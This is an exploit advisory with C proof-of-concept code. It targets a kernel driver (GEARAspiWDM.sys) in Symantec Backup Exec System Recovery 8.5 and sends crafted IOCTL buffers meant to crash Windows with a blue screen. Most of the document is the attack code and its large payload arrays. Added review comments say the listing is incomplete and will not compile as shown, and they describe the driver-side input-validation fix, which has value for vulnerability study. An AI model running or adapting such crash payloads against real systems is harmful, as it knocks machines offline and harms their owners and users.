Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences 0day 2011-05-12 12:15:04

#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <stdlib.h>
#include <string.h>

Program : Symantec Backup Exec System Recovery 8.5 - 0day
Homepage : http://www.symantec.com
Discovery : 2009/12/23
Author Contacted : 2011/04/01 - No reply
Author Contacted : 2011/04/29 - No reply... again !
Patch Updated : Not now
Found by : Heurs
This Advisory : Heurs
Contact : [email protected]

//----- Application description

Symantec Backup Exec System Recovery 8.5 is a complete disk-based system
recovery solution for Microsoft Windows based servers, desktops, and laptops
that allows businesses to recover from system loss or disasters in minutes, not
hours or days - even when recovering to a dissimilar hardware platform; to a
virtual environment; or to a remote, unattended location. In short, this
powerful solution gives an administrator unprecedented power in meeting
ambitious recovery time objectives and service-level agreements.

//----- Description of vulnerability

The GEARAspiWDM.sys driver (the CD / DVD filter) does not check all inputs of an IOCTL.
An exception can be thrown by modifying a single byte.
In my tests I could not achieve anything better than a BSOD.

//----- Credits


s.leberre at sysdream dot com
heurs at ghostsinthestack dot org


// Interactive proof-of-concept from the advisory above: asks the user for "1" or "2"
// and issues one fixed IOCTL control code (0x00222008 or 0x00222010) with a fixed
// buffer to hDevice. The advisory reports the result as a kernel bugcheck (BSOD).
//
// NOTE(review): the listing as reproduced here is not compilable — the opening brace
// of main, the "};" that should terminate both arrays, the closing braces of the
// if-blocks and the CreateFile() call that would obtain a driver handle are all
// missing. Nothing below is reconstructed; comments only describe what is visible.
// The driver-side fix is the usual one: validate the input/output buffer lengths of
// every IOCTL against the expected structure size and probe/capture any user
// pointers before dereferencing them.
int __cdecl main(int argc, char* argv[])
// 0xffffffff is INVALID_HANDLE_VALUE on 32-bit Windows. No CreateFile() appears in
// this listing, so as written every DeviceIoControl() call below would fail with
// ERROR_INVALID_HANDLE rather than reach the driver.
HANDLE hDevice = (HANDLE) 0xffffffff;
// Receives the byte count written by DeviceIoControl(); never read afterwards.
DWORD NombreByte;
// Payload for the 0x00222010 IOCTL: 128 lines x 4 = 512 DWORDs (2048 bytes).
// The values look random; per the advisory only a single byte is significant,
// but this listing does not indicate which one. Array is not terminated with "};".
DWORD Crashing2[] = {
0x98521a4e, 0x35c9b325, 0x329aded9, 0x2b89a43f,
0x9e338a58, 0x54372b5f, 0x1c6164bb, 0x439b3b32,
0x7ffa3ca5, 0x90ee3512, 0xb3be1b06, 0x9363dad1,
0x1f91adea, 0xcc611f7e, 0xdf527cc9, 0xb0856250,
0x4a0d92ff, 0x7b57a9fd, 0xe438ef46, 0x013ac977,
0xb6ce60fc, 0x6042a1f8, 0xe4da87f0, 0x118e4887,
0x47ea6b36, 0xfb83daa8, 0xd50ff81b, 0xfd3c97c9,
0xd743656a, 0x8b7318b7, 0x955d2607, 0x0cb6d64f,
0x3acc85fb, 0xca8f44d3, 0x2859a3de, 0x80fdabb1,
0x63b5fc1d, 0x9b2b73d7, 0x16038535, 0xb8072dca,
0xda4edb5a, 0xe7e89f58, 0xd2b0d395, 0x64b404a4,
0x422f6292, 0xafb88db2, 0xefee2383, 0x2034e944,
0x9c7f782e, 0x40d0b37e, 0x95c621e1, 0xc67d9c45,
0xf4bfc4d8, 0xa6b50be6, 0xaf327fcf, 0x8ea76c13,
0x85bf39d2, 0x3224f445, 0xf13ffd4d, 0x8a0ed02e,
0x11768b7f, 0x05da276b, 0xc264c7de, 0x70038327,
0x9f965ab9, 0x7bd47648, 0xfbe34062, 0x94e5540f,
0xe41cc6c2, 0x5b4a2559, 0x429e5122, 0x83c913e4,
0xca98e661, 0xbd3ad1fe, 0x972a24c2, 0xb77b0b77,
0x48e31285, 0x77dd9743, 0x42374f25, 0xdf841c34,
0x5aa3d162, 0x4f8cf953, 0xbc2ada9d, 0xa4cad244,
0x9080a47f, 0x27af163a, 0xf8e5b0e1, 0x80248421,
0x963b4b99, 0x2ca00d49, 0x81b3ef37, 0xc2466b09,
0x46ccb43a, 0xff10f2f9, 0xac712349, 0x5ad59d96,
0xd978b259, 0xcbcfeca1, 0x98273614, 0x332f6c59,
0xa486d4ee, 0x7fad0d57, 0xf65601c1, 0xeb1e6321,
0x50408419, 0x5190a0e8, 0xb3cc3374, 0xeabd4a3d,
0xd236b852, 0x92cba4db, 0x4e52f33a, 0xa9f488cb,
0x067d88e4, 0xd31d588d, 0x47aa2c28, 0xf0918cb3,
0x46c518af, 0x430a2c52, 0xc49fc7ca, 0x49e7d5f0,
0x6cd26dbc, 0xd83fde69, 0x926c03ba, 0xb4850695,
0x9235d279, 0xaa1ffa33, 0x996f4d09, 0xbfed8fa0,
0x30cff2cc, 0x1f21d5c3, 0x38c3f62b, 0x8291db1e,
0xb536c7e0, 0x3c705ff0, 0x23f180a2, 0xdbb6059e,
0x4dd9351a, 0x231487bc, 0x915fe713, 0x87616e77,
0xdbcb473e, 0x1a830215, 0x8cbba20a, 0x902a03d8,
0xfcf9b1eb, 0xca69f2be, 0x44a96ca3, 0xa7d7aaab,
0x8949408f, 0xc9d0d1e2, 0x2775a41c, 0x71f381ff,
0xba970686, 0x222a18f5, 0xfab74884, 0xb53efcb4,
0xfbb46a7a, 0x1de45c9f, 0xbb5838ad, 0x274cfd1b,
0xa841ffcb, 0x02f17a83, 0x18fe4da2, 0xa4a1b953,
0x788a1f92, 0x8a0c5b81, 0x54b69f16, 0x570abe6b,
0x7e58db8e, 0x1d6d7245, 0x0f6f7b5e, 0x7121c421,
0xefa6a254, 0xb1fd7db2, 0xc9bc5216, 0x2ae57c8d,
0xa9ccba01, 0x1e375901, 0x0fe3e83b, 0x729f90db,
0x4e054937, 0x9861523c, 0x644cc902, 0xf23b2474,
0x599a913f, 0x32ccfcd9, 0x7f3ca050, 0x3de365f6,
0x55ca0856, 0x72113509, 0x188f3b56, 0x4fa1b960,
0x403d751a, 0xfeb043d7, 0x5b451a9d, 0x52cdfdf4,
0x7c84854c, 0xaea8abc2, 0x1f690135, 0x0d98ac73,
0x90d3fb36, 0x92c4c71c, 0xa329ece4, 0xffe6a577,
0x70a4829e, 0x9fd6b0b7, 0x13ec771e, 0xa8724de2,
0xa8d25ffb, 0x84b00cce, 0xa1791d95, 0xe6a5cb04,
0xd0460421, 0x0fa785ea, 0x0521dfea, 0x6b745113,
0xc3512018, 0x3613d26c, 0x5fcebf1f, 0x6dd6a8ed,
0xf29a61ce, 0x66e0c099, 0x2bff4910, 0x6e92dbdd,
0xafce203a, 0xed07a42b, 0x657cd627, 0xcc05e18f,
0x848aa8cd, 0x5db76bf0, 0x66feef0f, 0x36fefa72,
0xac75a2fa, 0x8cd0ec62, 0x2805f29c, 0x3f9af683,
0xedc84ed5, 0xcafa4942, 0x29f94618, 0x80d6f110,
0x924035d0, 0x239cfd83, 0x4251cea1, 0xf54575db,
0x3c9815b4, 0xcb86e9df, 0xe0a46e7b, 0x8feb5e66,
0x17dee85f, 0xcf9d26f4, 0x6afe496e, 0x3e8c1322,
0xe6f99038, 0xd4735c42, 0x760d0bd6, 0xb43c3c60,
0x788de1ce, 0xf52c1d56, 0xa6d31938, 0x275cb624,
0x9ae96c95, 0x194068c6, 0xe5eee0a2, 0x2ee7d840,
0xdd82ba28, 0x3435826a, 0x9a486fc3, 0x2701aa59,
0x6c362b8f, 0x4e5d96a6, 0x1bdc57f7, 0x754c2319,
0x71380617, 0x90542310, 0x65d72160, 0x3f77356e,
0x41e648e9, 0x250870ae, 0x29f398a2, 0x1b980674,
0x8d41476f, 0x9b9ec36a, 0x017d514a, 0x75badffc,
0x0ca9dccf, 0xb1fb1936, 0x6ca3bdd7, 0xc5fd39b8,
0x8d6878ba, 0x1769e6dc, 0xac396388, 0xaaa92090,
0xea758f25, 0x250ece7a, 0x84a575fb, 0x08f09242,
0xe983aa84, 0x06a02443, 0x047accd5, 0x86814c54,
0xae978f01, 0x2a8df4b7, 0x5079e1f7, 0x4599b151,
0x4b06b065, 0x0fa58f90, 0x11e0624c, 0xc3a3f881,
0xf795fe91, 0x9e9542c6, 0x37262888, 0x21dfb940,
0x695be284, 0x28d116e1, 0x7f81a807, 0x308a5e2b,
0x0312f4a5, 0xe77753d6, 0xa834b6dc, 0xc6f0f403,
0xa6a2b904, 0xeb26b1a4, 0x69849a3d, 0x8313560d,
0xe23d7a4b, 0xe96b1262, 0xe94255fb, 0x3901b1e9,
0x351d887b, 0x9e594997, 0xfe8f414c, 0x96f07011,
0xe68fc42c, 0xb38e30a2, 0x1994ef3a, 0x3efbfce9,
0x8b8f3a7f, 0xca93784e, 0x5f3181d7, 0xc84f06eb,
0x8ded82a7, 0x41300e14, 0xb478751b, 0xeeae732c,
0x392889a8, 0xb79591f1, 0xca8bb59d, 0x33d5ac3f,
0xcab7ffb1, 0x1c023d41, 0xf4d85961, 0xec42794f,
0xd3e126b0, 0x572fe83b, 0x7b3ea605, 0x4bfa2f3b,
0x595b381d, 0x0f1f55dd, 0xf07401fd, 0x322c17b4,
0x7ac23729, 0x9e747fa4, 0x648391dc, 0x684f5e6f,
0x6f672b78, 0xe57a7f45, 0x5fea1b7a, 0x562401c8,
0xa640bafe, 0x22a1ea24, 0x90a358c5, 0x2fa7712f,
0x75505628, 0xab0d1b9b, 0x7f40ccba, 0x74034eaf,
0xc7be1659, 0x35a10242, 0xcd61afed, 0x6a4f3f61,
0x6793d2e8, 0xb447eded, 0x81b09579, 0x8c57ec03,
0x7f89ca0d, 0xb75faf20, 0x6977fa05, 0x9d272f79,
0xaa90665a, 0x91fcc55b, 0xfa06b20e, 0xfcb48f7a,
0xce1760ed, 0x58dc9e13, 0x99152bc4, 0x9021e937,
0xfbc15bc5, 0xc49ab6cf, 0xfe322467, 0x1cda3004,
0x01badd03, 0x28308712, 0x05708f56, 0x612f4410,
0x3345bdfd, 0x0b3a8804, 0x36b0b314, 0xaf8b63a5,
0x90ca55ab, 0x1f946e9e, 0xecb27651, 0x7e5c8406,
0xd3f8fc3b, 0x1e30cf60, 0x3ac797fa, 0x48d3a898,
0xf4a6080d, 0x680e7e2e, 0x745388ff, 0x8027ded5,
0x461989ac, 0x5426a0a9, 0xa1ecc4a8, 0x3862c461,
0xda87b1ce, 0x9dbc1647, 0x225898f0, 0xf72d47fe,
0x0af3377d, 0xc5c569e7, 0xb8d8fb7a, 0x0c46c695,
0x508d9e3f, 0xc4a96a93, 0xef7450d3, 0x14860105,
0x9e5518bc, 0x56a024ee, 0xc1d14889, 0x9e9029ae,
0x06700d49, 0x5b4655a3, 0xe7c7e1be, 0x596c98b5,
0xf91d9006, 0x5daf3db2, 0xdbd3dea9, 0x2f1471d9,
0x5d26bd87, 0x7758e268, 0x6d6f3ab4, 0x45c55824,
0x60e4cf0e, 0x54c2b90d, 0x0317c728, 0xca7681b6,
0xb2813304, 0x14fb642e, 0x6297a465, 0x51f7b685,
0x24192969, 0x44b44d6f, 0x66cfe7ae, 0x8ff6a5a9,
0x772a7a50, 0x11d0163e, 0x598113c9, 0x3a03fef9,
0xff9c1a9b, 0xdbd7c110, 0x09b9282e, 0xb19a1723,
0x61d551ad, 0x4edd912c, 0x73cbe308, 0x2d507924,
0x8b6adc6a, 0x7249e4c5, 0xd46b6c78, 0x1a79ed3d,
0x35fc9732, 0x4f3c7746, 0x34537beb, 0xc7a4e647,
0xe524af91, 0x208894fa, 0xae2dc193, 0x7db25b89,
0x8cd21de4, 0x5cdaa83a, 0xf973bed3, 0x6ca77231,
0x6b6d299a, 0xa017dcfd, 0x53ea60d1, 0xe31720ba,
0xf406d12f, 0x8167076d, 0xb62a7ba8, 0x83a54a0d,
0x838c6ffc, 0xcd7b5253, 0x4b49b33b, 0x8ece311d,
0x5001914b, 0x1fcc872f, 0x36192027, 0x26889789,
0xb26a39d4, 0x69ce1d9e, 0x41d01758, 0x9ea92324,
// Payload for the 0x00222008 IOCTL: 15 DWORDs (60 bytes). Several of the words
// appear to decode as ASCII text when read little-endian (not verified here);
// the listing does not say which field triggers the fault. Also missing its "};".
DWORD Crashing1[] = {
0x34e4fa15, 0xd60f859b, 0x45470f01, 0x73415241,
0x66206970, 0x4e20726f, 0x45470054, 0x6f505241,
0x50207472, 0x6e00506e, 0xacea16d8, 0xef58b300,
0x36609f08, 0xf826b866, 0x06257426
// Declared but never referenced in this listing.
BYTE Out[0x04];
// Holds the user's menu choice; only Response[0] is examined.
BYTE Response[32];

printf("Kernel Pointers Dereferences - Symantec Backup Exec System Recovery 8.5 (0day)\n\n");
printf("Crashs possibles : \n1 : DeviceIoControl 0x00222008\n2 : DeviceIoControl 0x00222010");
printf("\nSelect the crash : ");
// Reads one character. &Response is a BYTE (*)[32], not the char * that "%c"
// expects; same address in practice, but a type mismatch a compiler will warn on.
scanf("%c", &Response);

// 0x32 == '2': send Crashing2 with control code 0x00222010. The same buffer is
// passed as both the input and the output buffer, so the driver may overwrite it.
if (Response[0] == 0x32) {
if (DeviceIoControl(hDevice,0x00222010,Crashing2,sizeof(Crashing2),Crashing2,sizeof(Crashing2),&NombreByte,NULL) == 0) {
// GetLastError() returns a DWORD; "%d" should be "%lu".
printf("Error : DeviceIoControl : %d\n", GetLastError());
// 0x31 == '1': send Crashing1 with control code 0x00222008. With the closing braces
// lost from this listing, this test appears nested inside the '2' branch's error
// path, where it could never be true; presumably it was a sibling if-block.
if (Response[0] == 0x31) {
if (DeviceIoControl(hDevice,0x00222008,Crashing1,sizeof(Crashing1),Crashing1,sizeof(Crashing1),&NombreByte,NULL) == 0) {
printf("Error : DeviceIoControl : %d\n", GetLastError());

// hDevice is never closed with CloseHandle() in this listing.
return 0;